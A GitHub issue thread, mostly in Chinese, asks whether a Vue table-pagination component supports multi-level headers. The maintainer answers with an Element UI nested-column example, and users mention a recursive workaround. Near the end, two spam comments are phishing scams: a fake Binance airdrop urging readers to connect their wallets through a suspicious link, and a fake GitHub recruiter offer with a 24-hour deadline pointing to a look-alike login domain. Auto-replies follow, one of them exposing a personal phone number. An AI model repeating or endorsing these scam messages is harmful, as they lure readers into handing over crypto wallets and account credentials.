### ISSUE TITLE
现在组件不支持多表头吧？

### ISSUE THREAD

**Issue by hanzhenchaoGit** [zollero/el-search-table-pagination#25]
现在组件不支持多表头吧？

**Comment by zollero** [comment]
你好，多级表头是比较新的特性，目前没有做专门的整合，不过你应该可以自己定义 `slot` 来实现。

比如，官方的例子：

```
<template>
  <el-table
    :data="tableData3"
    style="width: 100%">
    <el-table-column
      prop="date"
      label="日期"
      width="150">
    </el-table-column>
    <el-table-column label="配送信息">
      <el-table-column
        prop="name"
        label="姓名"
        width="120">
      </el-table-column>
      <el-table-column label="地址">
        <el-table-column
          prop="province"
          label="省份"
          width="120">
        </el-table-column>
        <el-table-column
          prop="city"
          label="市区"
          width="120">
        </el-table-column>
        <el-table-column
          prop="address"
          label="地址"
          width="300">
        </el-table-column>
        <el-table-column
          prop="zip"
          label="邮编"
          width="120">
        </el-table-column>
      </el-table-column>
    </el-table-column>
  </el-table>
</template>

<script>
  export default {
    data() {
      return {
        tableData3: [{
          date: '2016-05-03',
          name: '王小虎',
          province: '上海',
          city: '普陀区',
          address: '上海市普陀区金沙江路 1518 弄',
          zip: 200333
        }, {
          date: '2016-05-02',
          name: '王小虎',
          province: '上海',
          city: '普陀区',
          address: '上海市普陀区金沙江路 1518 弄',
          zip: 200333
        }, {
          date: '2016-05-04',
          name: '王小虎',
          province: '上海',
          city: '普陀区',
          address: '上海市普陀区金沙江路 1518 弄',
          zip: 200333
        }, {
          date: '2016-05-01',
          name: '王小虎',
          province: '上海',
          city: '普陀区',
          address: '上海市普陀区金沙江路 1518 弄',
          zip: 200333
        }, {
          date: '2016-05-08',
          name: '王小虎',
          province: '上海',
          city: '普陀区',
          address: '上海市普陀区金沙江路 1518 弄',
          zip: 200333
        }, {
          date: '2016-05-06',
          name: '王小虎',
          province: '上海',
          city: '普陀区',
          address: '上海市普陀区金沙江路 1518 弄',
          zip: 200333
        }, {
          date: '2016-05-07',
          name: '王小虎',
          province: '上海',
          city: '普陀区',
          address: '上海市普陀区金沙江路 1518 弄',
          zip: 200333
        }]
      }
    }
  }
</script>
```
可以通过这样的slot 来实现，请见下面的示例及效果：

https://codepen.io/zollero/pen/yqqQZO

**Comment by zollero** [comment]
暂不支持，我试了一下，用 slotName 的方式迁入还有点问题

**Comment by hanzhenchaoGit** [comment]
不过我做了一个临时的比较笨的方案 就是可以在组件里面手写三层遍历  一般表格最多也不超过3层表头不是？

**Comment by zollero** [comment]
是的😅

**Comment by chenjing0823** [comment]
@hanzhenchaoGit 您这边比较“笨”的三层遍历是如何遍历的。

**Comment by hanzhenchaoGit** [comment]
> @hanzhenchaoGit 您这边比较“笨”的三层遍历是如何遍历的。

现在是用递归的方式处理了

**Comment by changming1987117** [comment]
> > @hanzhenchaoGit 您这边比较“笨”的三层遍历是如何遍历的。
> 
> 现在是用递归的方式处理了

请问有代码示例吗？

**Comment by epysan** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @David1011, @haruolabs, @timlichen, @RO-29, @filipe1309, @lalghoul, @rubik, @andybergon, @johnie, @keloli, @powerumc, @heartj, @LuoTuxiu, @SkyTreasure, @tulioc, @hamuelna, @josephxsxn, @Jason524-luo, @jibin-tj, @pantaadit01, @jobou363, @Gerstep, @kuhy, @deankramer, @joshr4, @triplezhao, @19-years, @hoxizhu, @suzutan, @atypiape, @zyl0501, @Laudenlaruto, @zhitom, @americanpezza, @countcain, @talentlessguy, @Asuis, @gus3inov, @omigafu, @kymair, @mapleqin, @humishum, @chuli, @ArthurLDS, @lukemcdaniels, @jacobsayer, @Vin-Rockie-Create, @hetianxia, @davidlj95, @butterflyy

**Comment by apocanow1** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
luca590, @me37211994, @nirmalrizal, @VankaIn, @rishabhdeepsingh, @ammiiamm, @Lynnnnnn, @shaoruu, @deism, @kyehyukahn, @liqinggd, @treasersimplifies, @RonadoLong, @SohelSamim, @w614561012, @alc0r, @nicewook, @chentao0707, @xiaoluoboding, @duguhaotian

**Comment by hoxizhu** [comment]
我是建忠，您的邮件我已经收到，我会尽快回复，祝您生活愉快

**Comment by 0xtresser** [comment]
Hi there,Thank you for your email. I am currently offline and will not have access to email instantly. If this is urgent, please contact me by phone 18258583270. I will do my best to respond promptly to your email when I am on line.Best,

**Comment by hoxizhu** [comment]
我是建忠，您的邮件我已经收到，我会尽快回复，祝您生活愉快
